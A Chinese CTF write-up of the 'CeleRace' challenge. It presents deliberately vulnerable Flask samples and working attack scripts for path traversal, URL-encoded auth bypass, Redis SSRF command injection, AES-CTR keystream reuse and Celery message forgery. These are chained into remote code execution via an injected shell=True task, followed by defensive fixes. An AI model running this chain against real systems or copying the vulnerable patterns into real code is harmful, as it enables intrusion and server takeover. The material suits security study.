强网杯2025 CeleRace详解 - Celery任务队列RCE攻击链
题目概述
题目名称: CeleRace
题目提示: Carefully Read…Celeritously Race…Get a CRITICAL RCE…!
这是一道涉及Celery分布式任务队列的CTF Web题目,核心考点是通过多个漏洞的组合利用,最终实现远程代码执行(RCE)。题目涉及路径穿越、Redis SSRF、AES CTR加密缺陷以及Celery内部机制等多个知识点。
各个知识点我已经全部整理,在我的靶场Github中复现,未来会增加更多漏洞的复现,敬请期待吧!
知识点1: 路径穿越漏洞 (Path Traversal)
原理说明
路径穿越漏洞允许攻击者通过../序列访问或写入预期目录之外的文件。
简单样例
漏洞代码:
# vulnerable_server.py
from flask import Flask, request
import os
app = Flask(__name__)
@app.route('/save_session', methods=['POST'])
def save_session():
session_id = request.cookies.get('session_id', 'default')
data = request.json
# 漏洞: 直接使用用户输入构造文件路径
filepath = f"/tmp/sessions/{session_id}.json"
with open(filepath, 'w') as f:
f.write(str(data))
return {"status": "saved", "path": filepath}
if __name__ == '__main__':
app.run(port=5000)
攻击脚本:
import requests
# 正常使用
r = requests.post(
"http://localhost:5000/save_session",
cookies={"session_id": "user123"},
json={"username": "alice"}
)
print("正常访问:", r.json())
# 结果: /tmp/sessions/user123.json
# 路径穿越攻击
malicious_sid = "../" * 5 + "etc/passwd_backup"
r = requests.post(
"http://localhost:5000/save_session",
cookies={"session_id": malicious_sid},
json={"evil": "payload"}
)
print("攻击后:", r.json())
# 结果: /tmp/sessions/../../../../../etc/passwd_backup.json
# 实际写入: /etc/passwd_backup.json
防御方法:
import os
def safe_join(base_dir, user_input):
# 规范化路径并检查是否在基础目录内
full_path = os.path.normpath(os.path.join(base_dir, user_input))
if not full_path.startswith(base_dir):
raise ValueError("Path traversal detected!")
return full_path
知识点2: URL编码绕过权限检查
原理说明
某些框架在路由匹配和权限检查时处理URL的方式不一致,可以通过URL编码绕过。
简单样例
漏洞代码:
from flask import Flask, request, abort
app = Flask(__name__)
def require_admin(f):
def wrapper(*args, **kwargs):
path = request.path
# 漏洞: 只检查原始路径
if path.startswith('/admin/'):
if not is_admin():
abort(403)
return f(*args, **kwargs)
wrapper.__name__ = f.__name__
return wrapper
def is_admin():
return request.cookies.get('role') == 'admin'
@app.route('/admin/<path:action>')
@require_admin
def admin_action(action):
return {"result": f"Admin action: {action}"}
@app.route('/<path:other>')
def public_action(other):
return {"result": f"Public action: {other}"}
if __name__ == '__main__':
app.run(port=5000)
攻击脚本:
import requests
# 正常访问admin路径 - 被拦截
r = requests.get("http://localhost:5000/admin/delete_user")
print("直接访问:", r.status_code) # 403 Forbidden
# URL编码绕过
# %2e%2e = ..
# Flask路由规范化: /admin/%2e%2e/x -> /admin/../x -> /x
r = requests.get("http://localhost:5000/admin/%2e%2e/%2e%2e/delete_user")
print("编码绕过:", r.status_code, r.json()) # 200 OK
为什么能绕过:
require_admin检查的是request.path=/admin/%2e%2e/%2e%2e/delete_user- 不匹配
/admin/前缀(因为还有%2e%2e部分) - Flask路由系统会规范化路径,实际匹配到
/<path:other>路由
知识点3: Redis协议SSRF注入
原理说明
Redis使用简单的文本协议(RESP),可以通过HTTP请求注入Redis命令。
简单样例
受害服务器代码:
from flask import Flask, request
import requests
app = Flask(__name__)
@app.route('/fetch', methods=['POST'])
def fetch_url():
data = request.json
url = data['url']
method = data.get('verb', 'GET')
# 漏洞: 直接使用用户输入作为HTTP方法
response = requests.request(
method=method,
url=url,
timeout=5
)
return {"status": "ok", "preview": response.text[:200]}
if __name__ == '__main__':
app.run(port=5000)
Redis服务器:
# 启动Redis
docker run -d -p 6379:6379 redis:latest
攻击脚本:
import requests
# 正常使用Redis客户端
import redis
r = redis.Redis(host='localhost', port=6379)
r.set('test_key', 'test_value')
print("Normal:", r.get('test_key'))
# SSRF攻击注入Redis命令
payload = {
"url": "http://127.0.0.1:6379/",
"verb": "SET evil_key malicious_value\r\nQUIT\r\n"
}
# 发送恶意请求
response = requests.post("http://localhost:5000/fetch", json=payload)
print("SSRF Response:", response.json())
# 验证注入成功
print("Injected:", r.get('evil_key')) # b'malicious_value'
# 更复杂的例子: 读取所有键
payload = {
"url": "http://127.0.0.1:6379/",
"verb": "KEYS *\r\nQUIT\r\n"
}
response = requests.post("http://localhost:5000/fetch", json=payload)
print("All keys:", response.json())
Redis协议格式:
# RESP协议示例
*3\r\n # 3个参数的数组
$3\r\nSET\r\n # 第一个参数 "SET"
$3\r\nkey\r\n # 第二个参数 "key"
$5\r\nvalue\r\n # 第三个参数 "value"
# 简化的命令格式(也被支持)
SET key value\r\n
知识点4: AES CTR模式与Nonce重用
原理说明
AES CTR模式通过加密计数器生成密钥流,与明文异或得到密文。如果nonce重复,可以恢复密钥流。
简单样例
加密代码:
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
import base64
# 模拟有漏洞的加密服务
class VulnerableEncryption:
def __init__(self):
self.key = get_random_bytes(16)
self.nonce = get_random_bytes(8) # 漏洞: 固定nonce
def encrypt(self, plaintext):
cipher = AES.new(self.key, AES.MODE_CTR, nonce=self.nonce)
ciphertext = cipher.encrypt(plaintext.encode())
return base64.b64encode(ciphertext).decode()
# 创建加密服务
encryptor = VulnerableEncryption()
# 加密多个消息(使用相同nonce)
msg1 = "This is message number 1"
msg2 = "This is message number 2"
ct1 = encryptor.encrypt(msg1)
ct2 = encryptor.encrypt(msg2)
print("密文1:", ct1)
print("密文2:", ct2)
攻击脚本 - 已知明文攻击:
import base64
# 攻击者知道msg1的内容(已知明文)
known_plaintext = b"This is message number 1"
ct1_bytes = base64.b64decode(ct1)
# 恢复密钥流
# 因为: CT = PT ⊕ KeyStream
# 所以: KeyStream = PT ⊕ CT
keystream = bytes(a ^ b for a, b in zip(known_plaintext, ct1_bytes))
print("恢复的密钥流:", keystream.hex())
# 使用密钥流解密msg2
ct2_bytes = base64.b64decode(ct2)
recovered_msg2 = bytes(a ^ b for a, b in zip(ct2_bytes, keystream))
print("恢复的消息2:", recovered_msg2.decode())
print("原始消息2:", msg2)
# 构造任意加密消息
malicious_msg = b"This is EVIL message!!!"
malicious_ct = bytes(a ^ b for a, b in zip(malicious_msg, keystream))
print("伪造的密文:", base64.b64encode(malicious_ct).decode())
完整演示:
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
import base64
def demonstrate_ctr_reuse():
# 密钥和nonce
key = get_random_bytes(16)
nonce = get_random_bytes(8)
# 加密两条消息(相同nonce)
cipher1 = AES.new(key, AES.MODE_CTR, nonce=nonce)
pt1 = b"Attack at dawn tomorrow"
ct1 = cipher1.encrypt(pt1)
cipher2 = AES.new(key, AES.MODE_CTR, nonce=nonce)
pt2 = b"Retreat immediately now"
ct2 = cipher2.encrypt(pt2)
print("=== 原始数据 ===")
print(f"明文1: {pt1}")
print(f"密文1: {ct1.hex()}")
print(f"明文2: {pt2}")
print(f"密文2: {ct2.hex()}")
# 攻击者已知pt1和ct1,恢复密钥流
keystream = bytes(a ^ b for a, b in zip(pt1, ct1))
print(f"\n=== 恢复密钥流 ===")
print(f"密钥流: {keystream.hex()}")
# 解密未知消息pt2
recovered_pt2 = bytes(a ^ b for a, b in zip(ct2, keystream))
print(f"\n=== 解密消息2 ===")
print(f"恢复的明文: {recovered_pt2}")
# 伪造加密消息
fake_msg = b"Cancel all operations"
fake_ct = bytes(a ^ b for a, b in zip(fake_msg, keystream))
print(f"\n=== 伪造消息 ===")
print(f"伪造明文: {fake_msg}")
print(f"伪造密文: {fake_ct.hex()}")
# 验证伪造的密文
cipher3 = AES.new(key, AES.MODE_CTR, nonce=nonce)
decrypted = cipher3.decrypt(fake_ct)
print(f"解密验证: {decrypted}")
demonstrate_ctr_reuse()
知识点5: Celery分布式任务队列
原理说明
Celery是Python的异步任务队列,使用Redis/RabbitMQ作为消息代理。
简单样例
安装依赖:
pip install celery redis
docker run -d -p 6379:6379 redis:latest
任务定义 (tasks.py):
from celery import Celery
# 配置Celery
app = Celery('demo_tasks',
broker='redis://localhost:6379/0',
backend='redis://localhost:6379/0')
@app.task
def add(x, y):
return x + y
@app.task
def slow_task(seconds):
import time
time.sleep(seconds)
return f"Slept for {seconds} seconds"
启动Worker:
celery -A tasks worker --loglevel=info
客户端调用:
from tasks import add, slow_task
import time
# 异步调用
result = add.delay(4, 6)
print(f"Task ID: {result.id}")
print(f"Task State: {result.state}")
# 等待结果
print(f"Result: {result.get(timeout=10)}")
# 创建多个任务
tasks = []
for i in range(5):
task = slow_task.delay(2)
tasks.append(task)
print(f"Created task {i}: {task.id}")
# 等待所有任务完成
for i, task in enumerate(tasks):
print(f"Task {i} result: {task.get()}")
查看Redis中的任务数据:
import redis
import json
r = redis.Redis(host='localhost', port=6379, db=0)
# 查看队列中的任务
tasks = r.lrange('celery', 0, -1)
print(f"队列中有 {len(tasks)} 个任务")
for task in tasks[:3]: # 只显示前3个
task_data = json.loads(task)
print("\n任务数据结构:")
print(json.dumps(task_data, indent=2))
# 查看任务结果
keys = r.keys('celery-task-meta-*')
for key in keys[:3]:
result = r.get(key)
print(f"\n任务结果 {key.decode()}:")
print(json.loads(result))
知识点6: Celery Control协议
原理说明
Celery支持向Worker发送控制命令,如shutdown、pool_restart等,这些命令也是通过消息队列传递。
简单样例
使用API发送控制命令:
from celery import Celery
app = Celery('demo_tasks',
broker='redis://localhost:6379/0',
backend='redis://localhost:6379/0')
# 方法1: 使用celery命令行
# celery -A tasks control shutdown
# 方法2: 使用Python API
from celery.bin import control
inspector = app.control.inspect()
# 查看活动任务
active_tasks = inspector.active()
print("Active tasks:", active_tasks)
# 查看注册的任务
registered = inspector.registered()
print("Registered tasks:", registered)
# 发送shutdown命令
app.control.shutdown()
手动构造Control消息:
import json
import uuid
import redis
import base64
from kombu.serialization import dumps
r = redis.Redis(host='localhost', port=6379, db=0)
# 构造control消息
control_msg = {
"method": "shutdown",
"arguments": {},
"destination": None,
"pattern": None,
"matcher": None,
"ticket": str(uuid.uuid4()),
"reply_to": {
"exchange": "reply.celery.pidbox",
"routing_key": str(uuid.uuid4()),
},
}
# 序列化
body = dumps(control_msg)
# 构造Celery消息格式
task = {
"body": base64.b64encode(body).decode("utf-8"),
"content-encoding": "binary",
"content-type": "application/json",
"headers": {},
"properties": {
"correlation_id": str(uuid.uuid4()),
"delivery_mode": 2,
},
}
# 推送到控制队列
r.lpush('celery', json.dumps(task))
print("Control message sent!")
知识点7: Race Condition竞态条件
原理说明
当多个操作同时发生时,由于时序问题导致的安全漏洞。
简单样例
漏洞代码:
from flask import Flask, request
import threading
import time
app = Flask(__name__)
# 全局变量(漏洞所在)
user_balance = {"alice": 100}
@app.route('/transfer', methods=['POST'])
def transfer():
data = request.json
user = data['user']
amount = data['amount']
# 检查余额
if user_balance.get(user, 0) >= amount:
# 漏洞: 检查和扣款之间有时间间隔
time.sleep(0.1) # 模拟数据库查询延迟
user_balance[user] -= amount
return {"status": "success", "new_balance": user_balance[user]}
return {"status": "insufficient funds"}, 400
@app.route('/balance/<user>')
def get_balance(user):
return {"balance": user_balance.get(user, 0)}
if __name__ == '__main__':
app.run(port=5000, threaded=True)
攻击脚本 - 利用竞态条件:
import requests
import threading
def transfer_money():
try:
r = requests.post('http://localhost:5000/transfer',
json={"user": "alice", "amount": 60})
print(f"Thread {threading.current_thread().name}: {r.json()}")
except Exception as e:
print(f"Error: {e}")
# 创建多个并发请求
threads = []
for i in range(5):
t = threading.Thread(target=transfer_money, name=f"T{i}")
threads.append(t)
# 同时启动所有线程
for t in threads:
t.start()
for t in threads:
t.join()
# 检查最终余额
r = requests.get('http://localhost:5000/balance/alice')
print(f"\nFinal balance: {r.json()}")
# 期望: 100 - 60 = 40
# 实际: 可能是负数!(多次扣款成功)
在Celery场景中的应用:
import multiprocessing
import requests
def create_task(task_id):
"""创建耗时任务"""
requests.post('http://target/tasks/slow',
json={"data": "x" * 1000, "sleep": 30})
# 创建大量任务造成积压
pool = multiprocessing.Pool(processes=50)
for i in range(100):
pool.apply_async(create_task, args=(i,))
pool.close()
# 在积压期间执行SSRF读取pending任务
requests.post('http://target/ssrf',
json={"url": "http://redis:6379/",
"cmd": "LRANGE celery 0 -1"})
完整攻击流程
步骤1: 路径穿越启用debug模式
import requests
TARGET = "http://ctf-target:5000"
# 利用路径穿越写入debug标志文件
malicious_sid = "../" * 10 + "tmp/debug"
r = requests.post(
f"{TARGET}/register",
cookies={"mini_session": malicious_sid},
json={"username": "pwn", "password": "pwn"},
)
print("Debug enabled:", r.status_code)
步骤2: 绕过admin检查
def api_post(path, json_body):
r = requests.post(f"{TARGET}{path}", json=json_body, timeout=5)
return r.json()
# 正常路径被拦截
# /tasks/fetch -> 403 Forbidden
# 使用URL编码绕过
bypass_path = "/tasks/fetch/%2e%2e/%2e%2e/x"
payload = {"url": "http://example.com", "verb": "GET"}
result = api_post(bypass_path, payload)
print("Bypass result:", result)
步骤3: Redis SSRF + Race Condition
import multiprocessing
import time
# 创建大量耗时任务
def flood_tasks():
pool = multiprocessing.Pool(processes=50)
for i in range(100):
payload = {"url": "http://slowserver.com/slow", "verb": "POST"}
pool.apply_async(api_post, args=(bypass_path, payload))
pool.close()
pool.join()
print("Flooding tasks...")
flood_tasks()
# Redis SSRF读取队列
ssrf_payload = {
"url": "http://127.0.0.1:6379/",
"verb": "LRANGE celery 0 10\r\nQUIT\r\n",
"host": "127.0.0.1",
"body": ""
}
result = api_post(bypass_path, ssrf_payload)
print("SSRF result:", result)
步骤4: AES CTR密钥流恢复
import base64
# 从SSRF结果中提取密文
preview = result['result']['preview']
task_data = preview.split('\r\n')[2] # 解析Redis响应
encrypted_body = json.loads(task_data)['body']
# 已知明文(我们自己创建的任务)
known_plaintext = b'[[],{"url":"http://slowserver.com/slow","verb":"POST"}...]'
# 恢复密钥流
ciphertext = base64.b64decode(encrypted_body)
keystream = bytes(a ^ b for a, b in zip(known_plaintext, ciphertext))
print("Keystream recovered:", keystream.hex()[:50])
步骤5: 覆盖tasks.py
import uuid
task_id = str(uuid.uuid4())
# 构造DiagnosticsPersistError
malicious_task = {
"status": "FAILURE",
"result": {
"exc_type": "DiagnosticsPersistError",
"exc_message": json.dumps({
"path": "/app/src/tasks.py",
"content": """
import subprocess
def echo(message):
return subprocess.check_output(message, shell=True).decode()
"""
}),
"exc_module": "framework.app",
},
"task_id": task_id,
}
# 通过Redis SSRF写入
ssrf_payload = {
"url": "http://127.0.0.1:6379/",
"verb": f"SET celery-task-meta-{task_id} {json.dumps(json.dumps(malicious_task))}\r\nQUIT\r\n",
"host": "127.0.0.1",
"body": ""
}
api_post(bypass_path, ssrf_payload)
# 触发错误处理
requests.get(f"{TARGET}/tasks/result?id={task_id}")
print("tasks.py overwritten!")
步骤6: 发送shutdown控制消息
# 构造shutdown消息
shutdown_msg = {
"method": "shutdown",
"arguments": {},
"ticket": str(uuid.uuid4()),
"reply_to": {
"exchange": "reply.celery.pidbox",
"routing_key": str(uuid.uuid4()),
},
}
# 使用恢复的密钥流加密
msg_bytes = json.dumps(shutdown_msg).encode()
encrypted = bytes(a ^ b for a, b in zip(msg_bytes, keystream))
# 构造Celery消息
task = {
"body": base64.b64encode(encrypted).decode(),
"content-encoding": "binary",
"content-type": "application/x-miniws",
}
# 注入Redis
ssrf_payload = {
"url": "http://127.0.0.1:6379/",
"verb": f"LPUSH celery {json.dumps(json.dumps(task))}\r\nQUIT\r\n",
"host": "127.0.0.1",
"body": ""
}
api_post(bypass_path, ssrf_payload)
print("Shutdown message sent!")
步骤7: RCE获取Flag
import time
time.sleep(5) # 等待Worker重启
# 调用被修改的echo任务
r = api_post("/tasks/echo", {"message": "cat /flag"})
task_id = r["task_id"]
# 获取结果
time.sleep(2)
result = requests.get(f"{TARGET}/tasks/result?id={task_id}").json()
print("FLAG:", result['result']['echo'])
防御措施总结
1. 路径穿越防御
import os
def validate_path(base_dir, user_input):
safe_path = os.path.realpath(os.path.join(base_dir, user_input))
if not safe_path.startswith(os.path.realpath(base_dir)):
raise SecurityError("Path traversal detected")
return safe_path
2. 权限检查防御
def require_admin(f):
def wrapper(*args, **kwargs):
# 使用规范化后的路径检查
normalized_path = os.path.normpath(request.path)
if normalized_path.startswith('/admin/'):
verify_admin()
return f(*args, **kwargs)
return wrapper
3. SSRF防御
def is_safe_url(url):
from urllib.parse import urlparse
parsed = urlparse(url)
# 禁止内网IP
if parsed.hostname in ['127.0.0.1', 'localhost']:
return False
# 白名单域名
allowed_domains = ['example.com', 'api.trusted.com']
if parsed.hostname not in allowed_domains:
return False
return True
4. 加密安全
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
def encrypt_message(plaintext, key):
# 每次使用新的nonce
nonce = get_random_bytes(8)
cipher = AES.new(key, AES.MODE_CTR, nonce=nonce)
ciphertext = cipher.encrypt(plaintext)
# 返回nonce和密文
return nonce + ciphertext
5. 竞态条件防御
import threading
lock = threading.Lock()
def transfer(user, amount):
with lock: # 原子操作
if user_balance[user] >= amount:
user_balance[user] -= amount
return True
return False
总结
这道CTF题目展示了一个完整的攻击链,涉及的技术点包括:
- Web安全: 路径穿越、权限绕过、SSRF
- 密码学: AES CTR模式、已知明文攻击、密钥流重用
- 分布式系统: Celery任务队列、Redis消息代理
- 并发编程: Race Condition、多线程竞争
- 协议分析: Redis RESP协议、Celery消息格式
每个小漏洞单独看似不严重,但组合起来形成了一条完整的RCE攻击链。这提醒我们在实际开发中必须:
- 实施纵深防御策略
- 对所有用户输入进行严格验证
- 正确使用加密算法
- 保护内部服务不被外部访问
- 仔细处理并发和异步操作